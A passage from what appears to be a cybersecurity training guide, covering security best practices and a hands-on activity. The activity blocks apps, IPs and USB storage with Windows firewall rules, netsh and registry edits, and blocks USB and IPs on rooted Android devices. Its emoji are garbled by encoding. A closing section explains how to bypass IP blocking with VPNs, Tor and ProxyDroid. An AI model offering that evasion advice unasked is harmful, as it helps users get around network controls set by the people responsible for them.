Deploy EDR solutions like CrowdStrike Falcon, SentinelOne, or Microsoft Defender ATP.
Use real-time analytics and threat hunting features.
Integrate with SIEM for centralized monitoring.
π§° 4. Threat Intelligence Integration
Subscribe to threat intelligence feeds (MISP, AlienVault OTX, IBM X-Force).
Use tools to correlate indicators of compromise (IOCs) with internal logs.
Automate IOC-based blocking using SOAR (Security Orchestration, Automation, and Response).
π 5. Secure Configuration & Hardening
Use CIS Benchmarks and STIGs to harden systems.
Disable unnecessary ports, services, default accounts.
Monitor configuration drift using tools like Ansible, Chef, or Puppet.
𧬠6. Application Security (AppSec)
Perform Static (SAST), Dynamic (DAST) and Interactive (IAST) security testing.
Secure APIs using OAuth2, rate limiting, JWT, and input validation.
Conduct threat modeling using STRIDE or DREAD frameworks.
π£ 7. Red Team / Blue Team Exercises
Simulate real-world attacks (Red Team) vs. defenders (Blue Team).
Use MITRE ATT&CK framework to map adversary techniques.
Introduce Purple Teaming for collaboration and continuous improvement.
π 8. Security Logging & Monitoring
Implement centralized logging using SIEMs: Splunk, Elastic, QRadar, or Wazuh.
Set up alerts for anomalies like:
Lateral movement
Privilege escalation
Suspicious PowerShell scripts
π‘οΈ 9. Cloud Security Best Practices
Enforce IAM policies, multi-factor authentication, and least privilege on cloud platforms (AWS IAM, Azure RBAC, etc.).
Use Cloud Security Posture Management (CSPM) tools: Prisma Cloud, Wiz, Check Point Dome9.
Encrypt data at rest and in transit using KMS/HSM services.
π§ͺ 10. Regular Penetration Testing & Vulnerability Management
Schedule internal and third-party pentests.
Use Nessus, OpenVAS, Burp Suite, or Metasploit.
Maintain a structured vulnerability disclosure program (VDP) or bug bounty.
βοΈ Bonus Pro Tips for Experts
Use Threat Hunting Tools: Velociraptor, Osquery, Zeek
Monitor Dark Web Leaks of org data
Deploy Honeytokens and Honeypots to trap attackers
Implement Container & Kubernetes Security: Aqua, Sysdig, Falco
Review supply chain dependencies (e.g., via SCA tools like Snyk or WhiteSource)
Activity: Create a Custom Firewall Rule in Windows
π₯ Activity: Create a Custom Firewall Rule in Windows
πΉ Objective: Block a specific application from accessing the internet using Windows Firewall.
β Step-by-Step Instructions:
π Step 1: Open Windows Firewall Settings
Press Windows + R β Type wf.msc β Press Enter
(This opens Windows Defender Firewall with Advanced Security)
π οΈ Step 2: Create a New Outbound Rule
In the left panel, click on Outbound Rules
In the right panel, click on New Rule...
π Step 3: Choose Rule Type
Select Program β Click Next
Select This program path:
Click Browse and select any .exe file (e.g., chrome.exe, notepad.exe)
Click Next
π« Step 4: Block the Connection
Select Block the connection β Click Next
π Step 5: Apply the Rule
Check all three:
Domain
Private
Public β Click Next
π Step 6: Name the Rule
Enter a name like: Block Chrome Internet
Click Finish
β Done! That app is now blocked from accessing the internet.
Block IP, USB ports on computers
π Block an IP Address Using Command Line (Command Prompt)
Open Command Prompt as Administrator
Press Windows + X β Select Command Prompt (Admin) or Windows Terminal (Admin)
Run this command to block an IP:
netsh advfirewall firewall add rule name="BlockBadIP" dir=in action=block remoteip=123.123.123.123
Replace 123.123.123.123 with the IP you want to block.
π§Ό To Remove the Rule Later:
netsh advfirewall firewall delete rule name="BlockBadIP"
β To Confirm the Rule Was Added:
netsh advfirewall firewall show rule name="BlockBadIP"
π« Step 1: Block USB Ports (Prevent USB Storage Devices)
We'll disable the USBSTOR (USB Storage) driver.
π§ Run this in Command Prompt as Administrator:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f
This sets the USB Storage driver to "disabled" (value 4), so no USB devices will load.
β Step 2: Unblock USB Ports (Enable USB Storage Devices Again)
To re-enable the USB ports:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 3 /f
This sets the driver back to "manual" start (value 3), allowing USB devices again.
Blocking IP & USB on Android
π 1. Blocking USB (Pendrive) Detection on Android
Android devices donβt natively support USB drives unless:
USB OTG (On-The-Go) is enabled.
A USB drive is connected via OTG cable.
To block or control USB access, you'd have to do one of these:
β If Your Android is Rooted (More power!)
You can:
Modify system files to disable USB host mode.
Use iptables or SELinux policies to deny mount requests.
Example approach:
su
setprop persist.sys.usb.config none
This disables USB connection modes.
Or block mounting using:
chmod 000 /dev/block/sdX Β # Replace with actual block device for USB
π« If Your Android is Not Rooted
Options are limited, but you can:
Use apps (Device Policy Controllers) that restrict USB data transfer.
Disable OTG via developer options (not always available).
Use MDM (Mobile Device Management) policies in enterprise setups.
π 2. Blocking or Controlling IP Access on Android
You can either block certain IPs or bypass IP blocking.
π Block IPs:
If rooted:
su
iptables -A OUTPUT -d 192.168.1.100 -j DROP
To block a whole range:
iptables -A OUTPUT -d 192.168.0.0/24 -j DROP
If unrooted, install apps like:
NetGuard (open-source, no-root firewall)
NoRoot Firewall
These use VPN-based firewalls to block connections by app or IP.
π΅οΈββοΈ Bypass IP Blocking (If you want access to blocked sites)
Use VPNs like ProtonVPN or custom OpenVPN configs.
Use Tor for Android (Orbot + Orfox).
Use ProxyDroid (requires root) to reroute traffic.